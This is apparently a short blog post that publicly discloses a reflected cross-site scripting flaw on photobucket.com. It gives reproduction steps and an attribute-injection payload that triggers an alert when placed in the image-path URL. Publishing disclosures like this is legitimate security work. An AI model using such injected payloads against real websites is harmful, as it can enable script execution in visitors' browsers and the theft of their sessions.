Today I want to publish a reflected XSS which I found on February on Photobucket. While I was cleaning my email inbox I noticed I had this report since February and they have not answered me, so here it is!
Affected domain: http://photobucket.com
Steps to reproduce the vulnerability:
1. Go to http://photobucket.com/images/anything-you-want
2. Add this to it ---> " onmousemove="alert(0)">
Now your URL could be something like this: http://photobucket.com/images/android" onmousemove="alert(0)">?page=1
You have the XSS!